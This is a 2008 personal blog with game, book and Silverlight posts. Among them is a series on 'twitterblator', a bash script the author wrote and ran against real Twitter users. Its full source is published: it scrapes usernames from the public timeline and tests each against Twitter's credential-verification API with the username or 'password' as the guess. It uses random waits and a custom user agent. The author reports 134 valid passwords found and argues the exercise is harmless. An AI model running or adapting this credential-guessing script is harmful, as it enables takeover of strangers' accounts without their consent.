f-log

just another web log

29 Apr 2008 22:47
*grumble* *grumble* silverlight f*%$^ ...
While not hating silverlight I am trying to complete Mario Galaxy on the Wii, now up to 116 stars out of 120 but ...
Sarah ordered Mario Cart for the Wii for my birthday, it did not turn up. We rang after a week and were told we had to wait at least seven working days.Still did not show up so rang got our money back. At the weekend I spent sometime in the garden with Alex it just so happened that by pure fluke I followed the football we were playing with down the side alley and there was a cardboard box under so empty bags.
So we paid (again) and I have Mario Cart for the Wii with the steering wheel. Only got a to try it for a short while but seems a lot of fun and the online stuff had zero lag.
26 Apr 2008 22:24
When I am not busy hating silverlight I have been reading "Wild Fire" by Nelson Demille.
My Dad lent me this so I had not read the jacket before starting, this gave me a much more enjoyable experience, but as most people read the jackets before choosing a book I wonder what everyone else's experience was like.
First off I liked this book, it was funny, gritty and down right entertaining, and sometimes that's all you want so I am pleased to say this book offered that little bit more.
Everything (that could be) seemed routed in reality and the list of acknowledgments attests to how thorough the author is which took away from the problems in a Dan Brown books [1] [2] [3].
Perfect page turner, not to deep but enough to keep you interested and nothing so far out there it breaks the spell.
24 Apr 2008 21:36
Here is the promised source
Page.xaml
Page.xaml.cs
Images and sound are in the ClientBin/slOverclick.xap file with is a zip file, just rename it.
Todays reasons to hate silverlight, does not handle GIF files and crossdomain.xml is flakey.
23 Apr 2008 21:33
I still hate silverlight but at least I managed to produce a small game with it.
http://www.pay4foss.org/jumpstation/idoudo
Obviously it requires the silverlight plugin so for you with that or a working moonlight, it is a simple simon type game with blocks (rendered in Blender) that light up in a sequence that you must repeat getting longer and longer.
There is also sound created from scratch in audacity and an ear created in inkscape.
Before you can start you must click the button marked "click to begin", this caused be no end of problems as one of the (many) known bugs with silverlight is you can not change the visibility of a button in its own onclick event.
Then there is the "you can not play the same sound more than once" bug and many MANY others.
So although this is a simple game it was a struggle to get it to do the simplest things.
I will not mention mime types or URI references ...
Source tomorrow, when I have tidied it a bit.
21 Apr 2008 21:25
And the final twitterblator results are ...
134 hits (validated passwords) out of 49226 unique attempts.
Thats 1 in 367, which is pretty good really.
Remember as with any statistics this 1 in 367 is during the duration and date of my experiment, tomorrow no accounts used may be susceptible and the day after all the accounts used maybe bad.
As for future twitter experiments I have actually gone off the idea due to time it would take and instead I now playing with sliverlight.
Silverlight hates me and I hate silverlight (at the moment).
20 Apr 2008 22:44
twitterblator conclusions:
*Is running this evil? No, I do not record badly secured accounts nor do *ANYTHING* with them.
*Is the releasing the code evil? Hmmm, in theory any code can be subverted, I see nothing that is difficult or clever or even "script kiddie" friendly in the twitterblator code.
*Can twitter stop twitterblator? Yes, but it would be very hard for them. Either they profile usage i.e. check the repeated checks of accounts from a single IP address or lock down the API and access to twitter, this would kill hundreds of existing applications and web sites.
*Can twitterblator be used or modified for use with other micro blog sites? Yes, but it may take a lot of work due to *most* sites locking down the sort of access twitterblator make use of. Twitter has a verify account API option, I never *tried* to log this accounts in.
*What was the final ratio of secure to insecure accounts? answer tomorrow...
I was going to release the results under a "unnamed social site" but as so few users are affected I am happy to shout TWITTER all over the place.
Also, remember that if a user did not twit or was set to a private account during the test then they were not included.
Now for my next twitter project (as the source is so rich) ... ;)
19 Apr 2008 21:32
OK the twitterblator code, short and sweet#!/bin/bash
# twitterblator tb.sh
# 16/04/2007 -
# tests twitter accounts for 'default' passwords
# see README for more information

USERAGENT=`cat agentstring.dat`
TEMPFILEUSERS="temp.users"
TEMPFILEUSERSDD="temp.usersdd"
TEMPFILEACCESS="temp.access"
DATABASE="db.users"
VERIFYURL="http://twitter.com/account/verify_credentials.xml"
SOURCEURL="http://twitter.com/statuses/public_timeline.rss"
HITDB="db.hit"
TEMPFILEHITS="temp.hit"

wget --quiet --wait=4 --random-wait -O - -U "$USERAGENT" $SOURCEURL | grep "^\W*<guid>" | sed -e 's/.*com\/\([^\/]*\).*/\1/gi' > $TEMPFILEUSERS

# do deduping here
rm -f $TEMPFILEUSERSDD
touch $TEMPFILEUSERSDD
echo "Deduping"
echo "|--------------------|" # most likey 20 lines
echo -n " "
while read line; do
    echo -n ":"
    grep -w -q $line $DATABASE || echo $line >> $TEMPFILEUSERSDD
done < $TEMPFILEUSERS
if [ -e $TEMPFILEUSERSDD ]; then
    cat $TEMPFILEUSERSDD >> $DATABASE
fi
echo ""

# setup usernames and passwords
awk '{ if (length>5) printf("--user=%s --password=%s\n",$0,$0); else printf("--user=%s --password=password\n",$0); }' $TEMPFILEUSERSDD > $TEMPFILEACCESS

# check accounts
rm -f $TEMPFILEHITS
echo "checking accounts"
echo "|--------------------|" # most likey up to 20
echo -n " "
touch $TEMPFILEHITS
while read line; do
    echo -n ":"
    wget --quiet --wait=4 --random-wait --delete-after -U "$USERAGENT" $line $VERIFYURL && echo 1 >> $TEMPFILEHITS
done < $TEMPFILEACCESS
echo ""

# report results
echo -n "found "
if [ -e $TEMPFILEHITS ]; then
    echo -n `wc -l $TEMPFILEHITS | cut -d " " -f 1`
else
    echo -n "0"
fi
echo " hits in last attempt"
cat $TEMPFILEHITS >> $HITDB

echo -n "that is a total of "
if [ -e $HITDB ]; then
    echo -n `wc -l $HITDB | cut -d " " -f 1`
else
    echo -n "0"
fi
echo -n " hits for "
echo -n `wc -l $DATABASE | cut -d " " -f 1`
echo " users"

# tidy up temp files
rm -f $TEMPFILEUSERS
rm -f $TEMPFILEUSERSDD
rm -f $TEMPFILEACCESS
rm -f $TEMPFILEHITS

As always I could have done it very differently, less temp files, different language etc. but this was a quick hack and I was presently surprised how quickly I got the AWK and the deduping working :)
18 Apr 2008 17:37
Twitterblator update. Its been running for over 16 hours andDeduping
|--------------------|
::::::::::::::::::::
checking accounts
|--------------------|
::::::::::
found 0 hits in last attempt
that is a total of 47 hits for 11939 users

It's worth noting at this point that twitterblater is not in violation of the Terms of Service as once an account has been verified nothing is done, i.e. the user is not logged on. Nor is any information pertaining to which user was verified or what type of default password was used is recorded.
while true; do sleep 65; sh tb.sh; done
I have got to say for a service that lets you use its system *WITHOUT* verifying your email address I expected a much higher hit count. But one thing I did notice is lots of twitterers have non English user names and posts so maybe I should trying the localised version of "password" :)
The "Deduping" section above make sure the regular posters are not repeatedly targeted and the number of ":" under "checking accounts" is the number of new unique usernames to try out of the twenty received each time.
So at the end of this I am going to have a text file with thousands of usernames ...
Oh, publishing the code, erm maybe tomorrow ...
17 Apr 2008 22:54
Steve alerted me to twitter,a microblog site that can be easily updated.
I decided to have a look after I saw answerme and noticed it was accessing *everyone's* twitters, though that turned out to be just public twitters.
Time to have a look at twitter. First off there is a public "latest posts" page with an rss option, not only easy to scrape but application developers are encouraged to do so.
Its worth noting at this point that the *many* twitter alternatives lock this functionality down by requiring access via a registered APPID (application identifier supplied by the site owners).
Next, instead of having to connect via a POST HTML form twitter allows anyone to *try* a username and password combination and return success or failure.
So it took me almost no time to write a bash script that;
Retrieved the latest public twitterings.
Parsed out all the user names.
Tried each user name along with a default password.
Logged if the combination was a success.
Reported how many hits had been found against the total attempted.
Default password is either the user name or "password" as twitter passwords have to be 6 characters or more.
Currently Deduping
|--------------------|
::::::::::::::::::::
checking accounts
|--------------------|
::::::::::::::::
found 0 hits in last attempt
that is a total of 3 hits for 800 users

Now to leave it over night ...
And the name for this naughtiness ? the twitterblator.
14 Apr 2008 21:49
The last book review was almost a 9 months ago, I am sure I have read something since then ...
I got a signed copy of A Cat Called Birmingham(paperback), the author lives near my mum. Looked a bit odd, subtitled "A biography of nine lives" but was actually really good.
Read a bit like a number of blog posts recounting events in the cat+owners lives, very easy to read guaranteed to make you laugh out loud or at least chuckle. Which itself is odd due to most of these "events" relating to cat-tastrophes of a painful nature.
Since then I have also read "Patricia Cornwell's Book of the Dead" which was a gift from my Aunt.
This book has the grip of Dan brown book but with out the constant feeling you do not want to be reading it. Very well done, three dimensional characters and twisting interweaving story line that at one point I was worried was going to come out all 'Hollywood' and spoil everything but left me with a contended feeling I read a good book !
12 Apr 2008 20:01
Boa cgi and 502 Bad Gateway
The CGI was not CGI/1.1 compliant.

even with the simplest perl script, turns out that all CGi scripts *MUST* output the mime type of the content e.g.
#!/usr/bin/perl
print "Content-type: text/html\n\n";
print "zombie"

just to get the single word output "zombie"
Surprisingly this information does not appear anywhere for the 502 error but if you read numerous CGI "getting-started" tutorials the requirement is made. Some web servers have a directive to disable the requirement.
Boa is currently running on my NSlu2
07 Apr 2008 21:29
WOW! I need to buy shares in the company making anything called a USB Finger Mouse
The future is here
loading results, please wait loading animateloading animateloading animate
[More tags]
rss feed

email

root

flog archives


Disclaimer:
This page is by me for me, if you are not me then please be aware of the following
I am not responsible for anything that works or does not work including files and pages made available at www.jumpstation.co.uk I am also not responsible for any information(or what you or others do with it) available at www.jumpstation.co.uk
In fact I'm not responsible for anything ever, so there!

[Pay4Foss banner long]